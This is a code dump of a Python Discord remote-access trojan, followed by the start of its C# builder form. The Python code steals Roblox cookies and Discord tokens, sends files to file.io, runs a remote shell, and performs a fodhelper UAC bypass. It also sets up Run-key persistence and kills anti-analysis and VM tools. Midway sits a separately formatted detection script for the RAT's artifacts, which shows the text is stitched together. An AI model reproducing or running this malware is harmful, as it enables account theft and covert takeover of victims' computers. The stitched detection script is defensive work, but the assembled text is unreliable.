browser_cookie3.chrome(domain_name='roblox.com') 847 | for cookie in cookies: 848 | if cookie.name == '.ROBLOSECURITY': 849 | data.append(cookies) 850 | data.append(cookie.value) 851 | return data 852 | except: 853 | pass 854 | 855 | 856 | 857 | 858 | 859 | 860 | @client.command() 861 | async def grabroblox(ctx, *, usid): 862 | cookies = cookieLogger() 863 | roblox_cookie = cookies[1] 864 | if usid == clientid: 865 | postchannel = client.get_channel(int(roblosecurity_channel_id)) 866 | await ctx.send(f":skull_crossbones: Started searching for **{os.getlogin()}**'s ROBLOSECURITY") 867 | await postchannel.send(f""" 868 | {ctx.author.mention} .ROBLOSECURITY for **{os.getlogin()}** : 869 | ``` 870 | {roblox_cookie} 871 | ``` 872 | 873 | Bypass IP lock with https://rbxfresh.com/ 874 | """) 875 | await ctx.send(f":white_check_mark: **{os.getlogin()}**'s cookies have been sent in <#{roblosecurity_channel_id}>") 876 | 877 | def token_grab(): 878 | LOCAL = os.getenv("LOCALAPPDATA") 879 | ROAMING = os.getenv("APPDATA") 880 | PATHS = [ 881 | ROAMING + "\\Discord", 882 | ROAMING + "\\discordcanary", 883 | ROAMING + "\\discordptb", 884 | LOCAL + "\\Google\\Chrome\\User Data\\Default", 885 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 1", 886 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 2", 887 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 3", 888 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 4", 889 | LOCAL + "\\Google\\Chrome\\User Data\\Profile 5", 890 | ROAMING + "\\Opera Software\\Opera Stable", 891 | LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default", 892 | LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default", 893 | ROAMING + "\\Opera Software\\Opera GX Stable\\" 894 | 895 | ] 896 | 897 | for path in reversed(PATHS): 898 | if not os.path.exists(path): 899 | PATHS.remove(path) 900 | 901 | regex1 = "[\\w-]{24}\.[\\w-]{6}\\.[\\w-]{27}" 902 | regex2 = r"mfa\\.[\\w-]{84}" 903 | encrypted_regex = "dQw4w9WgXcQ:[^.*\\['(.*)'\\].*$]{120}" 904 | 905 | def 
getheaders(token=None, content_type="application/json"): 906 | headers = { 907 | "Content-Type": content_type, 908 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11" 909 | } 910 | if token: 911 | headers.update({"Authorization": token}) 912 | return headers 913 | 914 | def decrypt_payload(cipher, payload): 915 | return cipher.decrypt(payload) 916 | 917 | def generate_cipher(aes_key, iv): 918 | return AES.new(aes_key, AES.MODE_GCM, iv) 919 | 920 | def decrypt_token(buff, master_key): 921 | try: 922 | iv = buff[3:15] 923 | payload = buff[15:] 924 | cipher = generate_cipher(master_key, iv) 925 | decrypted_pass = decrypt_payload(cipher, payload) 926 | decrypted_pass = decrypted_pass[:-16].decode() 927 | return decrypted_pass 928 | except Exception: 929 | return "Couldn't decrypt token" 930 | 931 | def get_master_key(path): 932 | with open(path, "r", encoding="utf-8") as f: 933 | local_state = f.read() 934 | local_state = json.loads(local_state) 935 | 936 | master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) 937 | master_key = master_key[5:] 938 | master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] 939 | return master_key 940 | 941 | def gettokens(path): 942 | path1=path 943 | path += "\\Local Storage\\leveldb" 944 | tokens = [] 945 | try: 946 | if not "discord" in path.lower(): 947 | for file_name in os.listdir(path): 948 | if not file_name.endswith('.log') and not file_name.endswith('.ldb'): 949 | continue 950 | for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: 951 | for token in findall(regex1, line): 952 | try: 953 | r = requests.get("https://discord.com/api/v9/users/@me", headers=getheaders(token)) 954 | if r.status_code == 200: 955 | if token in tokens: 956 | continue 957 | except Exception: 958 | continue 959 | tokens.append(token) 960 | for token in findall(regex2, line): 961 | print(token) 
962 | try: 963 | r = requests.get("https://discord.com/api/v9/users/@me", headers=getheaders(token)) 964 | if r.status_code == 200: 965 | if token in tokens: 966 | continue 967 | except Exception: 968 | continue 969 | tokens.append(token) 970 | else: 971 | for file_name in os.listdir(path): 972 | if not file_name.endswith('.log') and not file_name.endswith('.ldb'): 973 | continue 974 | for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: 975 | for y in findall(encrypted_regex, line): 976 | token = decrypt_token(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(path1 + '\\Local State')) 977 | try: 978 | r = requests.get("https://discord.com/api/v9/users/@me", headers=getheaders(token)) 979 | if r.status_code == 200: 980 | if token in tokens: 981 | continue 982 | tokens.append(token) 983 | 984 | except: 985 | continue 986 | return tokens 987 | except Exception as e: 988 | return [] 989 | all_tokens=[] 990 | for path_grab in PATHS: 991 | if os.path.exists(path_grab): 992 | for token in gettokens(path_grab): 993 | all_tokens.append(f"`{path_grab}` - **{token}**") 994 | return str(all_tokens).replace("[", "").replace("]", "").replace("'", "").replace(",", "") 995 | 996 | @client.command() 997 | async def grabdiscord(ctx, *, usid): 998 | if usid == clientid: 999 | postchannel = client.get_channel(int(tokens_channel_id)) 1000 | await ctx.send(f":skull_crossbones: Searching for **{os.getlogin()}**'s account tokens...") 1001 | await postchannel.send(f"{ctx.author.mention} Account tokens for **{os.getlogin()}** : \n\n{token_grab()}") 1002 | await ctx.send(f":white_check_mark: **{os.getlogin()}**'s account tokens have been sent in <#{tokens_channel_id}>") 1003 | 1004 | 1005 | @client.command() 1006 | async def chdir(ctx, usid, *, directory): 1007 | if usid == clientid: 1008 | if directory != "<": 1009 | try: 1010 | os.chdir(f"{os.getcwd()}\\{directory}") 1011 | await ctx.send(f"Directory changed to **{directory}** 
for **{os.getlogin()}**") 1012 | except: await ctx.send(f"Error accessing directory for **{os.getlogin()}**") 1013 | elif directory == "<": 1014 | try: 1015 | os.chdir('..') 1016 | await ctx.send(f"Moved one directory back for **{os.getlogin()}** -> **{os.getcwd()}**") 1017 | except: await ctx.send(f"Error moving one directory back for **{os.getlogin()}**") 1018 | 1019 | @client.command() 1020 | async def ls(ctx, *, usid): 1021 | if usid == clientid: 1022 | output = subprocess.getoutput('dir') 1023 | if output: 1024 | result = output 1025 | numb = len(result) 1026 | if numb < 1: 1027 | await ctx.send(f"Error displaying current directory for **{os.getlogin()}**.") 1028 | elif numb > 1: 1029 | temp = (os.getenv('TEMP')) 1030 | if os.path.isfile(temp + r"\output22.txt"): 1031 | os.system(r"del %temp%\output22.txt /f") 1032 | f1 = open(temp + r"\output22.txt", 'a') 1033 | f1.write(result) 1034 | f1.close() 1035 | file = discord.File(temp + r"\output22.txt", filename="output22.txt") 1036 | await ctx.send(f"Current directory items for **{os.getlogin()}**:\n\n-", file=file) 1037 | else: 1038 | await ctx.send(f"Current directory items for **{os.getlogin()}**:\n\n" + result) 1039 | 1040 | @client.command() 1041 | async def download(ctx, usid, *, path): 1042 | if usid == clientid: 1043 | try: 1044 | filename = path 1045 | check2 = os.stat(filename).st_size 1046 | except: await ctx.send(f"File path doesn't exist.") 1047 | if check2 > 7340032: 1048 | try: 1049 | await ctx.send(f"Please wait while downloading the file from **{os.getlogin()}**...") 1050 | response = requests.post('https://file.io/', files={"file": open(filename, "rb")}).json()["link"] 1051 | await ctx.send(f"Success downloading file from **{os.getlogin()}**. 
Download link : {response}") 1052 | except: await ctx.send(f"Access denied.") 1053 | else: 1054 | try: 1055 | file = discord.File(path, filename=path) 1056 | await ctx.send(f"Success downloading file from **{os.getlogin()}**.", file=file) 1057 | except: await ctx.send(f"Access denied.") 1058 | 1059 | @client.command() 1060 | async def upload(ctx, usid, *, path): 1061 | if usid == clientid: 1062 | if ctx.message.attachments: 1063 | try: 1064 | await ctx.message.attachments[0].save(path) 1065 | await ctx.send(f"Saved attachment for **{os.getlogin()}** in **{path}**") 1066 | except WindowsError as e: 1067 | await ctx.send(f"System error uploading attachment in **{path}** for **{os.getlogin()}**") 1068 | 1069 | @client.command() 1070 | async def bypass_uac(ctx, *, usid): 1071 | if usid == clientid: 1072 | def isAdmin(): 1073 | try: 1074 | is_admin = (os.getuid() == 0) 1075 | except AttributeError: 1076 | is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 1077 | return is_admin 1078 | if isAdmin(): 1079 | await ctx.send(f"You already have admin privileges against **{os.getlogin()}**!") 1080 | else: 1081 | class disable_fsr(): 1082 | disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection 1083 | revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection 1084 | def __enter__(self): 1085 | self.old_value = ctypes.c_long() 1086 | self.success = self.disable(ctypes.byref(self.old_value)) 1087 | def __exit__(self, type, value, traceback): 1088 | if self.success: 1089 | self.revert(self.old_value) 1090 | await ctx.send(f"Started UAC Bypass process on **{os.getlogin()}**") 1091 | isexe=False 1092 | if (sys.argv[0].endswith("exe")): 1093 | isexe=True 1094 | if not isexe: 1095 | test_str = sys.argv[0] 1096 | current_dir = inspect.getframeinfo(inspect.currentframe()).filename 1097 | cmd2 = current_dir 1098 | create_reg_path = """ powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force """ 1099 | os.system(create_reg_path) 1100 | 
create_trigger_reg_key = """ powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force """ 1101 | os.system(create_trigger_reg_key) 1102 | create_payload_reg_key = """powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start python """ + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\'"' + """ -Force""" 1103 | os.system(create_payload_reg_key) 1104 | else: 1105 | test_str = sys.argv[0] 1106 | current_dir = test_str 1107 | cmd2 = current_dir 1108 | create_reg_path = """ powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force """ 1109 | os.system(create_reg_path) 1110 | create_trigger_reg_key = """ powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force """ 1111 | os.system(create_trigger_reg_key) 1112 | create_payload_reg_key = """powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start """ + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\'"' + """ -Force""" 1113 | os.system(create_payload_reg_key) 1114 | with disable_fsr(): 1115 | os.system("fodhelper.exe") 1116 | remove_reg = """ powershell Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force """ 1117 | os.system(remove_reg) 1118 | 1119 | @client.command() 1120 | async def startfile(ctx, usid, *, filepath): 1121 | if usid == clientid: 1122 | try: 1123 | os.startfile(filepath) 1124 | await ctx.send(f"**{filepath}** has been executed for **{os.getlogin()}**.") 1125 | except WindowsError as e: 1126 | await ctx.send(f"**{filepath}** cannot be executed for **{os.getlogin()}**.") 1127 | 1128 | @client.command() 1129 | async def tasklist(ctx, *, usid): 1130 | if usid == clientid: 1131 | if 1==1: 1132 | result = subprocess.getoutput("tasklist") 1133 | numb = len(result) 1134 | if numb < 1: 1135 | 
await ctx.send(f"Error displaying active tasks for **{os.getlogin()}**") 1136 | elif numb > 1990: 1137 | temp = (os.getenv('TEMP')) 1138 | if os.path.isfile(temp + r"\olist.txt"): 1139 | os.system(r"del %temp%\olist.txt /f") 1140 | f1 = open(temp + r"\olist.txt", 'a') 1141 | f1.write(result) 1142 | f1.close() 1143 | file = discord.File(temp + r"\olist.txt", filename="olist.txt") 1144 | await ctx.send(f"Active tasks for **{os.getlogin()}** :", file=file) 1145 | else: 1146 | await ctx.send(f"Active tasks for **{os.getlogin()}** : " + result) 1147 | 1148 | @client.command() 1149 | async def taskkill(ctx, usid, *, proc): 1150 | if usid == clientid: 1151 | kilproc = r"taskkill /IM" + ' "' + proc + '" ' + r"/f" 1152 | os.system(kilproc) 1153 | process_name = proc 1154 | call = 'TASKLIST', '/FI', 'imagename eq %s' % process_name 1155 | output = subprocess.check_output(call).decode() 1156 | last_line = output.strip().split('\r\n')[-1] 1157 | done = (last_line.lower().startswith(process_name.lower())) 1158 | if done == False: 1159 | await ctx.send(f"Killed the **{proc}** task for **{os.getlogin()}**") 1160 | elif done == True: 1161 | await ctx.send(f"Error killing the **{proc}** task for **{os.getlogin()}**") 1162 | 1163 | @client.command() 1164 | async def delfile(ctx, usid, *, filepath): 1165 | if usid == clientid: 1166 | try: 1167 | if os.path.exists(filepath): 1168 | if os.path.isdir(filepath): 1169 | shutil.rmtree(filepath) 1170 | await ctx.send(f"Deleted directory **{filepath}** from **{os.getlogin()}**") 1171 | return 1172 | os.remove(filepath) 1173 | await ctx.send(f"Deleted file **{filepath}** from **{os.getlogin()}**") 1174 | except WindowsError as e: 1175 | await ctx.send(f"System error trying to delete **{filepath}** from **{os.getlogin()}**") 1176 | 1177 | @client.command() 1178 | async def setwp(ctx, *, usid): 1179 | if usid == clientid: 1180 | path = os.path.join(os.getenv('TEMP') + r"\temp.jpg") 1181 | await ctx.message.attachments[0].save(path) 1182 | 
ctypes.windll.user32.SystemParametersInfoW(20, 0, path , 0) 1183 | await ctx.send(f"Changed wallpaper for **{os.getlogin()}**") 1184 | 1185 | @client.command() 1186 | async def critproc(ctx, *, usid): 1187 | if usid == clientid: 1188 | is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 1189 | if is_admin == True: 1190 | ctypes.windll.ntdll.RtlAdjustPrivilege(20, 1, 0, ctypes.byref(ctypes.c_bool())) 1191 | ctypes.windll.ntdll.RtlSetProcessIsCritical(1, 0, 0) == 0 1192 | await ctx.send(f"Successfully set the task to a critical process for **{os.getlogin()}**.") 1193 | else: 1194 | await ctx.send(f"Insufficient permissions to critproc for **{os.getlogin()}**") 1195 | 1196 | @client.command() 1197 | async def hidefile(ctx, usid, *, filepath): 1198 | if usid == clientid: 1199 | try: 1200 | p = os.popen('attrib +h ' + filepath) 1201 | t = p.read() 1202 | p.close() 1203 | await ctx.send(f"**{filepath}** has been hidden for **{os.getlogin()}**") 1204 | except: 1205 | await ctx.send(f"Error hiding **{filepath}** for **{os.getlogin()}**") 1206 | 1207 | @client.command() 1208 | async def unhidefile(ctx, usid, *, filepath): 1209 | if usid == clientid: 1210 | try: 1211 | p = os.popen('attrib -h ' + filepath) 1212 | t = p.read() 1213 | p.close() 1214 | await ctx.send(f"**{filepath}** is now visible for **{os.getlogin()}**") 1215 | except: 1216 | await ctx.send(f"Error returning **{filepath}** to visible for **{os.getlogin()}**") 1217 | 1218 | @client.command() 1219 | async def key_press(ctx, usid, *, keyname): 1220 | if usid == clientid: 1221 | try: 1222 | pyautogui.press(keyname) 1223 | await ctx.send(f"**{os.getlogin()}** has pressed the **{keyname}** key.") 1224 | except: await ctx.send(f"**{keyname}** is not recognized as a key.") 1225 | 1226 | @client.command() 1227 | async def screenflip(ctx, *, usid): 1228 | if usid == clientid: 1229 | try: 1230 | screen = rs.get_primary_display() 1231 | start_pos = screen.current_orientation 1232 | pos = abs((start_pos - 1*90) % 360) 
1233 | screen.rotate_to(pos) 1234 | await ctx.send(f"**{os.getlogin()}**'s screen has been flipped.") 1235 | except: await ctx.send(f"**{os.getlogin()}**'s screen could not be flipped.") 1236 | 1237 | @client.command() 1238 | async def hardware_list(ctx, *, usid): 1239 | if usid == clientid: 1240 | message = "" 1241 | message += f"`CPU`: **{psutil.cpu_count()}** cores\n" 1242 | message += f"`RAM`: **{psutil.virtual_memory().total / (1024.0 ** 3)}** GB\n" 1243 | message += f"`Hard disk`: **{psutil.disk_usage('/').total / (1024.0 ** 3)}** GB\n" 1244 | message += f"`Boot device`: {psutil.disk_partitions()[0].device}" 1245 | await ctx.send(f"Hardware information for **{os.getlogin()}**: \n\n{message}") 1246 | 1247 | @client.command() 1248 | async def chdisk(ctx, usid, *, disk): 1249 | if usid == clientid: 1250 | try: 1251 | os.chdir(disk) 1252 | await ctx.send(f"Disk changed to **{disk}** for **{os.getlogin()}**") 1253 | except: await ctx.send(f"Error changing disk to **{disk}** for **{os.getlogin()}**") 1254 | 1255 | @client.command() 1256 | async def restart(ctx, *, usid): 1257 | if usid == clientid: 1258 | await ctx.send(f"**{os.getlogin()}**'s PC has been shut down.") 1259 | os.system("shutdown /r /t 1") 1260 | 1261 | @client.command() 1262 | async def hidetaskbar(ctx, *, usid): 1263 | if usid == clientid: 1264 | try: 1265 | h = ctypes.windll.user32.FindWindowA(b'Shell_TrayWnd', None) 1266 | ctypes.windll.user32.ShowWindow(h, 0) 1267 | await ctx.send(f"**{os.getlogin()}**'s taskbar has been hidden.") 1268 | except: await ctx.send(f"**{os.getlogin()}**'s taskbar could not be hidden.") 1269 | 1270 | @client.command() 1271 | async def showtaskbar(ctx, *, usid): 1272 | if usid == clientid: 1273 | try: 1274 | h = ctypes.windll.user32.FindWindowA(b'Shell_TrayWnd', None) 1275 | ctypes.windll.user32.ShowWindow(h, 9) 1276 | await ctx.send(f"**{os.getlogin()}**'s taskbar has been returned.") 1277 | except: await ctx.send(f"**{os.getlogin()}**'s taskbar couldn't be 
returned.") 1278 | 1279 | @client.command() 1280 | async def shell(ctx, usid, *, command=""): 1281 | if usid == clientid: 1282 | if command != "": 1283 | try: 1284 | output = os.popen(command).read() 1285 | if len(output) > 2000: 1286 | temp_file = os.path.join(os.getenv('TEMP'), 'output.txt') 1287 | with open(temp_file, 'w') as file: 1288 | file.write(output) 1289 | await ctx.send('Output is too long. Sending as a file.', file=discord.File(temp_file)) 1290 | os.remove(temp_file) 1291 | else: 1292 | if output != "": 1293 | await ctx.send(f'Shell output for **{os.getlogin()}**:\n```{output}```') 1294 | else: 1295 | await ctx.send(f'Output empty for **{os.getlogin()}**') 1296 | except Exception as e: 1297 | await ctx.send(f'An error occurred: {str(e)}') 1298 | else: 1299 | await ctx.send(f"Please input a shell command for **{os.getlogin()}**") 1300 | 1301 | 1302 | def mainfunc(): 1303 | bluser = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex', 'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq', 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a', 'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl', 'harry johnson', 'j.seance', 'a.monaldo', 'tvm') 1304 | bltask = ('vm3dservice', 'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray', 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice', 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc', 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol', 'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice', 'vmwaretray', 'discordtokenprotector', 'processhacker') 1305 | 1306 | if hide_after_exec != False: 1307 | p = os.popen('attrib +h "' + sys.executable + '"') 1308 | p.close() 1309 | 1310 | if antivm != False: 1311 | result = subprocess.getoutput("tasklist") 1312 | numb = len(result) 1313 | if numb > 0: 1314 | temp = (os.getenv('TEMP')) 1315 | if os.path.isfile(temp + 
r"\olist.txt"): 1316 | os.system(r"del %temp%\olist.txt /f") 1317 | f1 = open(temp + r"\olist.txt", 'a') 1318 | f1.write(result) 1319 | f1.close() 1320 | final = "" 1321 | with open(f"{os.getenv('TEMP')}\olist.txt") as A: 1322 | final = A.read().lower() 1323 | for task in bltask: 1324 | if task in final: 1325 | try: 1326 | kilproc = r"taskkill /IM" + ' "' + task + '.exe' + '" ' + r"/f" 1327 | os.system(kilproc) 1328 | except: sys.exit(0) 1329 | 1330 | os.remove(f"{temp}\olist.txt") 1331 | 1332 | if f"{os.getlogin()}".lower() in bluser: 1333 | sys.exit(0) 1334 | 1335 | if autostart != False: 1336 | if sys.argv[0].endswith("exe"): 1337 | if not os.path.exists(backdoor_location): 1338 | shutil.copyfile(sys.executable, backdoor_location) 1339 | key_path = r"Software\Microsoft\Windows\CurrentVersion\Run" 1340 | command = 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v visuals /t REG_SZ /d "' + backdoor_location + '" /f' 1341 | key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_SET_VALUE) 1342 | winreg.SetValueEx(key, "visuals", 0, winreg.REG_SZ, command) 1343 | winreg.CloseKey(key) 1344 | subprocess.call(command, shell=True) 1345 | p = os.popen('attrib +h "' + backdoor_location + '"') 1346 | p.close() 1347 | if not sys.argv[0].endswith(process_name): 1348 | os.startfile(backdoor_location) 1349 | os._exit(0) 1350 | 1351 | 1352 | 1353 | if __name__ == '__main__': 1354 | mainfunc() 1355 | 1356 | client.run(token) 1357 | -------------------------------------------------------------------------------- /App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Form1.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace aphrobyte_discord_rat 2 | { 3 | partial class Form1 4 | { 5 | /// 6 | /// Required designer variable. 
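The Python agent above stages a fodhelper UAC bypass through the `HKCU\Software\Classes\ms-settings\Shell\Open\command` key (a `DelegateExecute` value plus a `(Default)` command), persists through a Run value named `visuals` pointing into `AppData\Roaming`, and writes its `tasklist` output to `%TEMP%\olist.txt`. The detection logic below is an added example, not code from the aphrobyte repository, that flags those host artifacts in constructed Sysmon-style event lines; the `key="value"` layout, the event IDs, the `svchost32.exe` file name and the user `bob` are all assumptions made for the sample.

```python
"""Detection logic for the host artifacts left by the Discord RAT agent above.
Added example (not from the aphrobyte repository). The event lines are constructed;
their key="value" layout and the Sysmon-style event IDs (1 = process create,
11 = file create, 12/13 = registry key/value set) are assumptions about the log source."""

import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule severity line")

# Indicators taken from the agent code: the ms-settings handler key written before
# fodhelper.exe is launched, the Run value name used for persistence, and the temp
# files the tasklist / ls / shell commands spool their output into.
MS_SETTINGS_CMD = r"\classes\ms-settings\shell\open\command"
RUN_VALUE_SUFFIX = r"\currentversion\run\visuals"
TEMP_ARTIFACTS = ("olist.txt", "output22.txt", "output.txt")

_KV = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line):
    """Turn one constructed key="value" event line into a dict."""
    return {k: v for k, v in _KV.findall(line)}


def scan_events(lines):
    """Run the rules over event lines in order; returns a list of Finding.

    The fodhelper rule is stateful: a fodhelper.exe launch is only flagged when its
    parent process previously wrote the ms-settings handler key, which separates
    the bypass from a user simply opening Settings."""
    findings = []
    hijackers = set()  # lower-cased image paths that wrote the ms-settings key
    for line in lines:
        ev = parse_event(line)
        eid = ev.get("EventID")
        image = ev.get("Image", "").lower()
        if eid in ("12", "13"):
            target = ev.get("TargetObject", "").lower()
            if MS_SETTINGS_CMD in target:
                hijackers.add(image)
                findings.append(Finding(
                    "ms-settings handler hijack (fodhelper UAC bypass staging)", "high", line))
            elif target.endswith(RUN_VALUE_SUFFIX):
                findings.append(Finding(
                    "Run-key persistence value 'visuals'", "medium", line))
        elif eid == "1":
            parent = ev.get("ParentImage", "").lower()
            if image.endswith("\\fodhelper.exe") and parent in hijackers:
                findings.append(Finding(
                    "fodhelper.exe launched by the process that staged the hijack",
                    "critical", line))
        elif eid == "11":
            fname = ev.get("TargetFilename", "")
            base = fname.rsplit("\\", 1)[-1].lower()
            if base in TEMP_ARTIFACTS and "\\temp\\" in fname.lower():
                findings.append(Finding(f"agent temp artifact {base}", "low", line))
    return findings


# Constructed sample telemetry: five malicious events followed by two benign look-alikes.
AGENT = "C:\\Users\\bob\\AppData\\Roaming\\svchost32.exe"
SAMPLE_EVENTS = [
    f'EventID="13" Image="{AGENT}" TargetObject="HKU\\S-1-5-21-1\\Software\\Classes'
    f'\\ms-settings\\Shell\\Open\\command\\DelegateExecute" Details="hi"',
    f'EventID="13" Image="{AGENT}" TargetObject="HKU\\S-1-5-21-1\\Software\\Classes'
    f'\\ms-settings\\Shell\\Open\\command\\(Default)" Details="cmd /c start {AGENT}"',
    f'EventID="1" Image="C:\\Windows\\System32\\fodhelper.exe" ParentImage="{AGENT}"',
    f'EventID="13" Image="{AGENT}" TargetObject="HKU\\S-1-5-21-1\\Software\\Microsoft'
    f'\\Windows\\CurrentVersion\\Run\\visuals" Details="{AGENT}"',
    f'EventID="11" Image="{AGENT}" TargetFilename="C:\\Users\\bob\\AppData\\Local\\Temp\\olist.txt"',
    # Benign: the user opened Settings, so fodhelper's parent is explorer.exe.
    'EventID="1" Image="C:\\Windows\\System32\\fodhelper.exe" ParentImage="C:\\Windows\\explorer.exe"',
    # Benign: an output.txt outside %TEMP% is not the agent's spool file.
    'EventID="11" Image="C:\\Program Files\\App\\app.exe" TargetFilename="C:\\Users\\bob\\Documents\\output.txt"',
]


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] {f.rule}")
```

Running the module prints five findings for the constructed sample, in the order high, high, critical, medium, low; the two benign lines produce none.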
7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1)); 32 | this.pictureBox1 = new System.Windows.Forms.PictureBox(); 33 | this.textBox1 = new System.Windows.Forms.TextBox(); 34 | this.label1 = new System.Windows.Forms.Label(); 35 | this.label2 = new System.Windows.Forms.Label(); 36 | this.textBox2 = new System.Windows.Forms.TextBox(); 37 | this.label3 = new System.Windows.Forms.Label(); 38 | this.textBox3 = new System.Windows.Forms.TextBox(); 39 | this.panel1 = new System.Windows.Forms.Panel(); 40 | this.label4 = new System.Windows.Forms.Label(); 41 | this.label5 = new System.Windows.Forms.Label(); 42 | this.panel2 = new System.Windows.Forms.Panel(); 43 | this.checkBox4 = new System.Windows.Forms.CheckBox(); 44 | this.checkBox2 = new System.Windows.Forms.CheckBox(); 45 | this.checkBox1 = new System.Windows.Forms.CheckBox(); 46 | this.textBox5 = new System.Windows.Forms.TextBox(); 47 | this.label7 = new System.Windows.Forms.Label(); 48 | this.label8 = new System.Windows.Forms.Label(); 49 | this.comboBox1 = new System.Windows.Forms.ComboBox(); 50 | this.label6 = new System.Windows.Forms.Label(); 51 | this.textBox4 = new System.Windows.Forms.TextBox(); 52 | this.button1 = new System.Windows.Forms.Button(); 53 | this.button2 = new System.Windows.Forms.Button(); 54 | 
this.checkBox5 = new System.Windows.Forms.CheckBox(); 55 | this.pictureBox2 = new System.Windows.Forms.PictureBox(); 56 | this.label9 = new System.Windows.Forms.Label(); 57 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); 58 | this.panel1.SuspendLayout(); 59 | this.panel2.SuspendLayout(); 60 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox2)).BeginInit(); 61 | this.SuspendLayout(); 62 | // 63 | // pictureBox1 64 | // 65 | this.pictureBox1.Dock = System.Windows.Forms.DockStyle.Top; 66 | this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image"))); 67 | this.pictureBox1.Location = new System.Drawing.Point(0, 0); 68 | this.pictureBox1.Name = "pictureBox1"; 69 | this.pictureBox1.Size = new System.Drawing.Size(799, 98); 70 | this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.Zoom; 71 | this.pictureBox1.TabIndex = 0; 72 | this.pictureBox1.TabStop = false; 73 | // 74 | // textBox1 75 | // 76 | this.textBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 77 | this.textBox1.Location = new System.Drawing.Point(138, 30); 78 | this.textBox1.Name = "textBox1"; 79 | this.textBox1.Size = new System.Drawing.Size(169, 20); 80 | this.textBox1.TabIndex = 1; 81 | // 82 | // label1 83 | // 84 | this.label1.AutoSize = true; 85 | this.label1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 86 | this.label1.ForeColor = System.Drawing.SystemColors.ButtonFace; 87 | this.label1.Location = new System.Drawing.Point(11, 34); 88 | this.label1.Name = "label1"; 89 | this.label1.Size = new System.Drawing.Size(54, 16); 90 | this.label1.TabIndex = 2; 91 | this.label1.Text = "Guild ID"; 92 | // 93 | // label2 94 | // 95 | this.label2.AutoSize = true; 96 | this.label2.Font = new System.Drawing.Font("Microsoft Sans Serif", 
